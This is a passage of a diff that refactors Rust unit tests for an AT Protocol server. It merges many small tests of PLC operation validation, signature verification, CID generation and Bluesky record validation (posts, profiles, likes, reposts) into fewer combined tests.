});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_rotation_key_required() {
|
||||
fn test_plc_submission_validation() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
let server_key = "did:key:zServer123";
|
||||
let op = json!({
|
||||
|
||||
let base_op = |rotation_key: &str, signing_key: &str, handle: &str, service_type: &str, endpoint: &str| json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {"atproto": did_key.clone()},
|
||||
"alsoKnownAs": ["at://test.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "AtprotoPersonalDataServer",
|
||||
"endpoint": "https://pds.example.com"
|
||||
}
|
||||
},
|
||||
"rotationKeys": [rotation_key],
|
||||
"verificationMethods": {"atproto": signing_key},
|
||||
"alsoKnownAs": [format!("at://{}", handle)],
|
||||
"services": { "atproto_pds": { "type": service_type, "endpoint": endpoint } },
|
||||
"sig": "test"
|
||||
});
|
||||
|
||||
let ctx = PlcValidationContext {
|
||||
server_rotation_key: server_key.to_string(),
|
||||
expected_signing_key: did_key.clone(),
|
||||
expected_handle: "test.handle".to_string(),
|
||||
expected_pds_endpoint: "https://pds.example.com".to_string(),
|
||||
};
|
||||
let result = validate_plc_operation_for_submission(&op, &ctx);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_signing_key_match() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
let wrong_key = "did:key:zWrongKey456";
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {"atproto": wrong_key},
|
||||
"alsoKnownAs": ["at://test.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "AtprotoPersonalDataServer",
|
||||
"endpoint": "https://pds.example.com"
|
||||
}
|
||||
},
|
||||
"sig": "test"
|
||||
});
|
||||
let ctx = PlcValidationContext {
|
||||
let op = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
|
||||
assert!(matches!(validate_plc_operation_for_submission(&op, &ctx), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
|
||||
|
||||
let ctx_with_user_key = PlcValidationContext {
|
||||
server_rotation_key: did_key.clone(),
|
||||
expected_signing_key: did_key.clone(),
|
||||
expected_handle: "test.handle".to_string(),
|
||||
expected_pds_endpoint: "https://pds.example.com".to_string(),
|
||||
};
|
||||
let result = validate_plc_operation_for_submission(&op, &ctx);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
|
||||
|
||||
let wrong_signing = base_op(&did_key, "did:key:zWrongKey", "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
|
||||
assert!(matches!(validate_plc_operation_for_submission(&wrong_signing, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
|
||||
|
||||
let wrong_handle = base_op(&did_key, &did_key, "wrong.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
|
||||
assert!(matches!(validate_plc_operation_for_submission(&wrong_handle, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
|
||||
|
||||
let wrong_service_type = base_op(&did_key, &did_key, "test.handle", "WrongServiceType", "https://pds.example.com");
|
||||
assert!(matches!(validate_plc_operation_for_submission(&wrong_service_type, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
|
||||
|
||||
let wrong_endpoint = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://wrong.endpoint.com");
|
||||
assert!(matches!(validate_plc_operation_for_submission(&wrong_endpoint, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_handle_match() {
|
||||
fn test_signature_verification() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {"atproto": did_key.clone()},
|
||||
"alsoKnownAs": ["at://wrong.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "AtprotoPersonalDataServer",
|
||||
"endpoint": "https://pds.example.com"
|
||||
}
|
||||
},
|
||||
"sig": "test"
|
||||
});
|
||||
let ctx = PlcValidationContext {
|
||||
server_rotation_key: did_key.clone(),
|
||||
expected_signing_key: did_key.clone(),
|
||||
expected_handle: "test.handle".to_string(),
|
||||
expected_pds_endpoint: "https://pds.example.com".to_string(),
|
||||
};
|
||||
let result = validate_plc_operation_for_submission(&op, &ctx);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_pds_service_type() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {"atproto": did_key.clone()},
|
||||
"alsoKnownAs": ["at://test.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "WrongServiceType",
|
||||
"endpoint": "https://pds.example.com"
|
||||
}
|
||||
},
|
||||
"sig": "test"
|
||||
});
|
||||
let ctx = PlcValidationContext {
|
||||
server_rotation_key: did_key.clone(),
|
||||
expected_signing_key: did_key.clone(),
|
||||
expected_handle: "test.handle".to_string(),
|
||||
expected_pds_endpoint: "https://pds.example.com".to_string(),
|
||||
};
|
||||
let result = validate_plc_operation_for_submission(&op, &ctx);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_pds_endpoint_match() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {"atproto": did_key.clone()},
|
||||
"alsoKnownAs": ["at://test.handle"],
|
||||
"services": {
|
||||
"atproto_pds": {
|
||||
"type": "AtprotoPersonalDataServer",
|
||||
"endpoint": "https://wrong.endpoint.com"
|
||||
}
|
||||
},
|
||||
"sig": "test"
|
||||
});
|
||||
let ctx = PlcValidationContext {
|
||||
server_rotation_key: did_key.clone(),
|
||||
expected_signing_key: did_key.clone(),
|
||||
expected_handle: "test.handle".to_string(),
|
||||
expected_pds_endpoint: "https://pds.example.com".to_string(),
|
||||
};
|
||||
let result = validate_plc_operation_for_submission(&op, &ctx);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_verify_signature_secp256k1() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"prev": null
|
||||
"type": "plc_operation", "rotationKeys": [did_key.clone()],
|
||||
"verificationMethods": {}, "alsoKnownAs": [], "services": {}, "prev": null
|
||||
});
|
||||
let signed = sign_operation(&op, &key).unwrap();
|
||||
let rotation_keys = vec![did_key];
|
||||
let result = verify_operation_signature(&signed, &rotation_keys);
|
||||
assert!(result.is_ok());
|
||||
assert!(result.unwrap());
|
||||
}
|
||||
let result = verify_operation_signature(&signed, &[did_key.clone()]);
|
||||
assert!(result.is_ok() && result.unwrap());
|
||||
|
||||
#[test]
|
||||
fn test_verify_signature_wrong_key() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let other_key = SigningKey::random(&mut rand::thread_rng());
|
||||
let other_did_key = signing_key_to_did_key(&other_key);
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"prev": null
|
||||
let other_did = signing_key_to_did_key(&other_key);
|
||||
let result = verify_operation_signature(&signed, &[other_did]);
|
||||
assert!(result.is_ok() && !result.unwrap());
|
||||
|
||||
let result = verify_operation_signature(&signed, &["not-a-did-key".to_string()]);
|
||||
assert!(result.is_ok() && !result.unwrap());
|
||||
|
||||
let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} });
|
||||
assert!(matches!(verify_operation_signature(&missing_sig, &[]), Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
|
||||
|
||||
let invalid_base64 = json!({
|
||||
"type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
|
||||
"alsoKnownAs": [], "services": {}, "sig": "not-valid-base64!!!"
|
||||
});
|
||||
let signed = sign_operation(&op, &key).unwrap();
|
||||
let wrong_rotation_keys = vec![other_did_key];
|
||||
let result = verify_operation_signature(&signed, &wrong_rotation_keys);
|
||||
assert!(result.is_ok());
|
||||
assert!(!result.unwrap());
|
||||
assert!(matches!(verify_operation_signature(&invalid_base64, &[]), Err(PlcError::InvalidResponse(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_verify_signature_invalid_did_key_format() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"prev": null
|
||||
});
|
||||
let signed = sign_operation(&op, &key).unwrap();
|
||||
let invalid_keys = vec!["not-a-did-key".to_string()];
|
||||
let result = verify_operation_signature(&signed, &invalid_keys);
|
||||
assert!(result.is_ok());
|
||||
assert!(!result.unwrap());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_tombstone_validation() {
|
||||
let op = json!({
|
||||
"type": "plc_tombstone",
|
||||
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
|
||||
"sig": "test"
|
||||
});
|
||||
let result = validate_plc_operation(&op);
|
||||
assert!(result.is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_cid_for_cbor_deterministic() {
|
||||
let value = json!({
|
||||
"alpha": 1,
|
||||
"beta": 2
|
||||
});
|
||||
fn test_cid_and_key_utilities() {
|
||||
let value = json!({ "alpha": 1, "beta": 2 });
|
||||
let cid1 = cid_for_cbor(&value).unwrap();
|
||||
let cid2 = cid_for_cbor(&value).unwrap();
|
||||
assert_eq!(cid1, cid2, "CID generation should be deterministic");
|
||||
assert!(
|
||||
cid1.starts_with("bafyrei"),
|
||||
"CID should start with bafyrei (dag-cbor + sha256)"
|
||||
);
|
||||
}
|
||||
assert_eq!(cid1, cid2, "CID should be deterministic");
|
||||
assert!(cid1.starts_with("bafyrei"), "CID should be dag-cbor + sha256");
|
||||
|
||||
#[test]
|
||||
fn test_cid_different_for_different_data() {
|
||||
let value1 = json!({"data": 1});
|
||||
let value2 = json!({"data": 2});
|
||||
let cid1 = cid_for_cbor(&value1).unwrap();
|
||||
let cid2 = cid_for_cbor(&value2).unwrap();
|
||||
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
|
||||
}
|
||||
let value2 = json!({ "alpha": 999 });
|
||||
let cid3 = cid_for_cbor(&value2).unwrap();
|
||||
assert_ne!(cid1, cid3, "Different data should produce different CIDs");
|
||||
|
||||
#[test]
|
||||
fn test_signing_key_to_did_key_format() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
assert!(
|
||||
did_key.starts_with("did:key:z"),
|
||||
"Should start with did:key:z"
|
||||
);
|
||||
assert!(did_key.len() > 50, "Did key should be reasonably long");
|
||||
}
|
||||
let did = signing_key_to_did_key(&key);
|
||||
assert!(did.starts_with("did:key:z") && did.len() > 50);
|
||||
assert_eq!(did, signing_key_to_did_key(&key), "Same key should produce same did");
|
||||
|
||||
#[test]
|
||||
fn test_signing_key_to_did_key_unique() {
|
||||
let key1 = SigningKey::random(&mut rand::thread_rng());
|
||||
let key2 = SigningKey::random(&mut rand::thread_rng());
|
||||
let did1 = signing_key_to_did_key(&key1);
|
||||
let did2 = signing_key_to_did_key(&key2);
|
||||
assert_ne!(
|
||||
did1, did2,
|
||||
"Different keys should produce different did:keys"
|
||||
);
|
||||
assert_ne!(did, signing_key_to_did_key(&key2), "Different keys should produce different dids");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_signing_key_to_did_key_consistent() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did1 = signing_key_to_did_key(&key);
|
||||
let did2 = signing_key_to_did_key(&key);
|
||||
assert_eq!(did1, did2, "Same key should produce same did:key");
|
||||
}
|
||||
fn test_tombstone_operations() {
|
||||
let tombstone = json!({ "type": "plc_tombstone", "prev": "bafyreig6xxxxxyyyyyzzzzzz", "sig": "test" });
|
||||
assert!(validate_plc_operation(&tombstone).is_ok());
|
||||
|
||||
#[test]
|
||||
fn test_sign_operation_removes_existing_sig() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"prev": null,
|
||||
"sig": "old_signature"
|
||||
});
|
||||
let signed = sign_operation(&op, &key).unwrap();
|
||||
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
|
||||
assert_ne!(new_sig, "old_signature", "Should replace old signature");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_plc_operation_not_object() {
|
||||
let result = validate_plc_operation(&json!("not an object"));
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_for_submission_tombstone_passes() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let did_key = signing_key_to_did_key(&key);
|
||||
let op = json!({
|
||||
"type": "plc_tombstone",
|
||||
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
|
||||
"sig": "test"
|
||||
});
|
||||
let ctx = PlcValidationContext {
|
||||
server_rotation_key: did_key.clone(),
|
||||
expected_signing_key: did_key,
|
||||
expected_handle: "test.handle".to_string(),
|
||||
expected_pds_endpoint: "https://pds.example.com".to_string(),
|
||||
};
|
||||
let result = validate_plc_operation_for_submission(&op, &ctx);
|
||||
assert!(
|
||||
result.is_ok(),
|
||||
"Tombstone should pass submission validation"
|
||||
);
|
||||
assert!(validate_plc_operation_for_submission(&tombstone, &ctx).is_ok());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_verify_signature_missing_sig() {
|
||||
fn test_sign_operation_and_struct() {
|
||||
let key = SigningKey::random(&mut rand::thread_rng());
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {}
|
||||
"type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
|
||||
"alsoKnownAs": [], "services": {}, "prev": null, "sig": "old_signature"
|
||||
});
|
||||
let result = verify_operation_signature(&op, &[]);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
|
||||
}
|
||||
let signed = sign_operation(&op, &key).unwrap();
|
||||
assert_ne!(signed.get("sig").and_then(|v| v.as_str()).unwrap(), "old_signature");
|
||||
|
||||
#[test]
|
||||
fn test_verify_signature_invalid_base64() {
|
||||
let op = json!({
|
||||
"type": "plc_operation",
|
||||
"rotationKeys": [],
|
||||
"verificationMethods": {},
|
||||
"alsoKnownAs": [],
|
||||
"services": {},
|
||||
"sig": "not-valid-base64!!!"
|
||||
});
|
||||
let result = verify_operation_signature(&op, &[]);
|
||||
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_plc_operation_struct() {
|
||||
let mut services = HashMap::new();
|
||||
services.insert(
|
||||
"atproto_pds".to_string(),
|
||||
PlcService {
|
||||
service_type: "AtprotoPersonalDataServer".to_string(),
|
||||
endpoint: "https://pds.example.com".to_string(),
|
||||
},
|
||||
);
|
||||
services.insert("atproto_pds".to_string(), PlcService {
|
||||
service_type: "AtprotoPersonalDataServer".to_string(),
|
||||
endpoint: "https://pds.example.com".to_string(),
|
||||
});
|
||||
let mut verification_methods = HashMap::new();
|
||||
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
|
||||
let op = PlcOperation {
|
||||
|
||||
@@ -9,187 +9,117 @@ fn now() -> String {
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_valid() {
|
||||
fn test_post_record_validation() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
|
||||
let valid_post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello world!",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&valid_post, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_missing_text() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
let missing_text = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
|
||||
}
|
||||
assert!(matches!(validator.validate(&missing_text, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "text"));
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_missing_created_at() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
let missing_created_at = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello"
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
|
||||
}
|
||||
assert!(matches!(validator.validate(&missing_created_at, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "createdAt"));
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_text_too_long() {
|
||||
let validator = RecordValidator::new();
|
||||
let long_text = "a".repeat(3001);
|
||||
let post = json!({
|
||||
let text_too_long = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": long_text,
|
||||
"text": "a".repeat(3001),
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
|
||||
}
|
||||
assert!(matches!(validator.validate(&text_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "text"));
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_text_at_limit() {
|
||||
let validator = RecordValidator::new();
|
||||
let limit_text = "a".repeat(3000);
|
||||
let post = json!({
|
||||
let text_at_limit = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": limit_text,
|
||||
"text": "a".repeat(3000),
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&text_at_limit, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_too_many_langs() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
let too_many_langs = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello",
|
||||
"createdAt": now(),
|
||||
"langs": ["en", "fr", "de", "es"]
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
|
||||
}
|
||||
assert!(matches!(validator.validate(&too_many_langs, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_three_langs_ok() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
let three_langs_ok = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello",
|
||||
"createdAt": now(),
|
||||
"langs": ["en", "fr", "de"]
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&three_langs_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_too_many_tags() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
let too_many_tags = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello",
|
||||
"createdAt": now(),
|
||||
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"]
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
|
||||
}
|
||||
assert!(matches!(validator.validate(&too_many_tags, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_eight_tags_ok() {
|
||||
let validator = RecordValidator::new();
|
||||
let post = json!({
|
||||
let eight_tags_ok = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello",
|
||||
"createdAt": now(),
|
||||
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"]
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&eight_tags_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_tag_too_long() {
|
||||
let validator = RecordValidator::new();
|
||||
let long_tag = "t".repeat(641);
|
||||
let post = json!({
|
||||
let tag_too_long = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello",
|
||||
"createdAt": now(),
|
||||
"tags": [long_tag]
|
||||
"tags": ["t".repeat(641)]
|
||||
});
|
||||
let result = validator.validate(&post, "app.bsky.feed.post");
|
||||
assert!(
|
||||
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/"))
|
||||
);
|
||||
assert!(matches!(validator.validate(&tag_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_profile_valid() {
|
||||
fn test_profile_record_validation() {
|
||||
let validator = RecordValidator::new();
|
||||
let profile = json!({
|
||||
|
||||
let valid = json!({
|
||||
"$type": "app.bsky.actor.profile",
|
||||
"displayName": "Test User",
|
||||
"description": "A test user profile"
|
||||
});
|
||||
let result = validator.validate(&profile, "app.bsky.actor.profile");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&valid, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_profile_empty_ok() {
|
||||
let validator = RecordValidator::new();
|
||||
let profile = json!({
|
||||
let empty_ok = json!({
|
||||
"$type": "app.bsky.actor.profile"
|
||||
});
|
||||
let result = validator.validate(&profile, "app.bsky.actor.profile");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&empty_ok, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_profile_displayname_too_long() {
|
||||
let validator = RecordValidator::new();
|
||||
let long_name = "n".repeat(641);
|
||||
let profile = json!({
|
||||
let displayname_too_long = json!({
|
||||
"$type": "app.bsky.actor.profile",
|
||||
"displayName": long_name
|
||||
"displayName": "n".repeat(641)
|
||||
});
|
||||
let result = validator.validate(&profile, "app.bsky.actor.profile");
|
||||
assert!(
|
||||
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")
|
||||
);
|
||||
}
|
||||
assert!(matches!(validator.validate(&displayname_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
|
||||
|
||||
#[test]
|
||||
fn test_validate_profile_description_too_long() {
|
||||
let validator = RecordValidator::new();
|
||||
let long_desc = "d".repeat(2561);
|
||||
let profile = json!({
|
||||
let description_too_long = json!({
|
||||
"$type": "app.bsky.actor.profile",
|
||||
"description": long_desc
|
||||
"description": "d".repeat(2561)
|
||||
});
|
||||
let result = validator.validate(&profile, "app.bsky.actor.profile");
|
||||
assert!(
|
||||
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description")
|
||||
);
|
||||
assert!(matches!(validator.validate(&description_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "description"));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_like_valid() {
|
||||
fn test_like_and_repost_validation() {
|
||||
let validator = RecordValidator::new();
|
||||
let like = json!({
|
||||
|
||||
let valid_like = json!({
|
||||
"$type": "app.bsky.feed.like",
|
||||
"subject": {
|
||||
"uri": "at://did:plc:test/app.bsky.feed.post/123",
|
||||
@@ -197,39 +127,24 @@ fn test_validate_like_valid() {
|
||||
},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&like, "app.bsky.feed.like");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&valid_like, "app.bsky.feed.like").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_like_missing_subject() {
|
||||
let validator = RecordValidator::new();
|
||||
let like = json!({
|
||||
let missing_subject = json!({
|
||||
"$type": "app.bsky.feed.like",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&like, "app.bsky.feed.like");
|
||||
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
|
||||
}
|
||||
assert!(matches!(validator.validate(&missing_subject, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f == "subject"));
|
||||
|
||||
#[test]
|
||||
fn test_validate_like_missing_subject_uri() {
|
||||
let validator = RecordValidator::new();
|
||||
let like = json!({
|
||||
let missing_subject_uri = json!({
|
||||
"$type": "app.bsky.feed.like",
|
||||
"subject": {
|
||||
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
|
||||
},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&like, "app.bsky.feed.like");
|
||||
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
|
||||
}
|
||||
assert!(matches!(validator.validate(&missing_subject_uri, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f.contains("uri")));
|
||||
|
||||
#[test]
|
||||
fn test_validate_like_invalid_subject_uri() {
|
||||
let validator = RecordValidator::new();
|
||||
let like = json!({
|
||||
let invalid_subject_uri = json!({
|
||||
"$type": "app.bsky.feed.like",
|
||||
"subject": {
|
||||
"uri": "https://example.com/not-at-uri",
|
||||
@@ -237,16 +152,9 @@ fn test_validate_like_invalid_subject_uri() {
|
||||
},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&like, "app.bsky.feed.like");
|
||||
assert!(
|
||||
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))
|
||||
);
|
||||
}
|
||||
assert!(matches!(validator.validate(&invalid_subject_uri, "app.bsky.feed.like"), Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
|
||||
|
||||
#[test]
|
||||
fn test_validate_repost_valid() {
|
||||
let validator = RecordValidator::new();
|
||||
let repost = json!({
|
||||
let valid_repost = json!({
|
||||
"$type": "app.bsky.feed.repost",
|
||||
"subject": {
|
||||
"uri": "at://did:plc:test/app.bsky.feed.post/123",
|
||||
@@ -254,355 +162,220 @@ fn test_validate_repost_valid() {
|
||||
},
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&repost, "app.bsky.feed.repost");
|
||||
assert_eq!(result.unwrap(), ValidationStatus::Valid);
|
||||
}
|
||||
assert_eq!(validator.validate(&valid_repost, "app.bsky.feed.repost").unwrap(), ValidationStatus::Valid);
|
||||
|
||||
#[test]
|
||||
fn test_validate_repost_missing_subject() {
|
||||
let validator = RecordValidator::new();
|
||||
let repost = json!({
|
||||
let repost_missing_subject = json!({
|
||||
"$type": "app.bsky.feed.repost",
|
||||
"createdAt": now()
|
||||
});
|
||||
let result = validator.validate(&repost, "app.bsky.feed.repost");
|
||||
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
|
||||
assert!(matches!(validator.validate(&repost_missing_subject, "app.bsky.feed.repost"), Err(ValidationError::MissingField(f)) if f == "subject"));
|
